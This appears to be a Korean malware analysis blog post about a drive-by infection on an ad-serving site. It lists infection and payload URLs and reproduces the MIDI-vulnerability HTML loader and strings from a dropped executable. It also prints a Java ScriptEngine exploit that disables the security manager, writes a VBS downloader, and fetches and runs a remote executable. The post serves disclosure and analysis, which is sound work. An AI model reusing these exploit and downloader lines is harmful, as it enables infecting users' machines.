http://ad.nsonmedia.com 내의 악성 스크립트 삽입 !

감염 사이트 : http://ad.tiad.co.kr/mt2.html
* 위 사이트는 현재도 감염중에 있습니다! 

메인 사이트 : http://ad.tiad.co.kr/mt2.htm0

• http://jips.kips.or.kr/ad.htm0
• 최종파일 다운 :  http://61.251.187.176/kr/files/java.ex0
                        :  http://jips.kips.or.kr/Applet.ja0  ~> JAVA 취약점
                                                        ~> temp%//happy.vbs 생성
                    
• http://jips.kips.or.kr/down.htm0
• 최종파일 다운 : http://61.251.187.176/kr/files/004.ex0
• MID 취약점 다운로드 :   http://jips.kips.or.kr/test_case.mi0  ~> MID 취약점

Down.html MID 취약점 스크립트 !

<body>

<object ID="audio" WIDTH=1 HEIGHT=1 CLASSID="CLSID:22D6F312-B0F6-11D0-94AB-0080C74C7E95">

<param name="fileName" value="test_case.mid">

<param name="SendPlayStateChangeEvents" value="true">

<param NAME="AutoStart" value="True">

<param name="uiMode" value="mini">

<param name="Volume" value="-300">

</object>

</body>

</html>

 

눈의 띄는것은 004.exe 중 Fucknaver.com 이라는게 제일 눈에 띄었다 !

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)  http://fucknaver/    > nul   /c  del    \cmd.exe    }   -   wuapi.exe   stubpath    %SystemRoot%\system32\wuapi.exe onents  ve Setup\Installed Comp \Microsoft\Acti Software    " /f        reg delete "HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\     reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\    \wuapi.exe  Version SOFTWARE\Microsoft\Ole  .exe    http://www.naver.com/    -start start   http://japanddrk/   wininet.dll ADVAPI32.dll    RegSetValueExA  RegCloseKey RegQueryValueExA    InternetOpenA   InternetOpenUrlA    InternetCloseHandle HttpQueryInfoA  RegOpenKeyExA   RegDeleteKeyA   RegCreateKeyA   kernel32.dll    WinExec 

 
Applet.jar

.project , ScriptEngineExp.class , .classpath , MANIFEST.MF 파일이 포함되어 있다 !

그중 ScriptEngineExp.class 속에 !

 ScriptEngineExp.java javax/script/ScriptEngineManagerjs A Bdata C Djava/lang/StringBuilder Pvar error = new Error("My error");this.toString = function(){ java.lang.System.setSecurityManager(null);java.lang.Runtime.getRuntime().exec('cmd.exe /c echo URL = LCase(WScript.Arguments(0))>"%temp%\\happy.vbs"&&cmd.exe /c echo dim m,s>>"%temp%\\happy.vbs"&&cmd.exe /c echo m="M^i^c^r^o^s^o^f^t^.^X^M^L^H^T^T^P">>"%temp%\\happy.vbs"&&cmd.exe /c echo s="A=D=O=DB=.=S=t=r=e=a=m">>"%temp%\\happy.vbs"&&cmd.exe /c echo set cmd =Createobject(replace(m,"^","")) >>"%temp%\\happy.vbs"&&cmd.exe /c echo cmd.Open "GET",URL,0 >>"%temp%\\happy.vbs"&&cmd.exe /c echo cmd.Send()>>"%temp%\\happy.vbs"&&cmd.exe /c echo FileName=LCase(WScript.Arguments(1))>>"%temp%\\happy.vbs"&&cmd.exe /c echo Set CsCriptGet = Createobject(replace(s,"=",""))>>"%temp%\\happy.vbs"&&cmd.exe /c echo CsCriptGet.Mode=^3>>"%temp%\\happy.vbs"&&cmd.exe /c echo CsCriptGet.Type=^1>>"%temp%\\happy.vbs"&&cmd.exe /c echo CsCriptGet.Open()>>"%temp%\\happy.vbs"&&cmd.exe /c echo CsCriptGet.Write(cmd.responseBody)>>"%temp%\\happy.vbs"&&cmd.exe /c echo CsCriptGet.SaveToFile FileName,^2>>"%temp%\\happy.vbs"&&cmd.exe /c cscript "%temp%\\happy.vbs"  E F+ "%temp%\\temp.exe"&& "%temp%\\temp.exe"');return "exploit!";};error.message = this; G H I J Kjavax/swing/JListjava/lang/Objecterror L K M N Ojavax/script/ScriptException P ScriptEngineExpjava/applet/AppletgetEngineByName/(Ljava/lang/String;)
Ljavax/script/ScriptEngine;getParameter&(Ljava/lang/String;)Ljava/lang/String;append-(Ljava/lang/String;)Ljava/lang/StringBuilder;toString()
Ljava/lang/String;javax/script/ScriptEngineeval&(Ljava/lang/String;)Ljava/lang/Object;get([Ljava/lang/Object;)Vadd*(Ljava/awt/Component;)Ljava/awt/Component;printStackTrace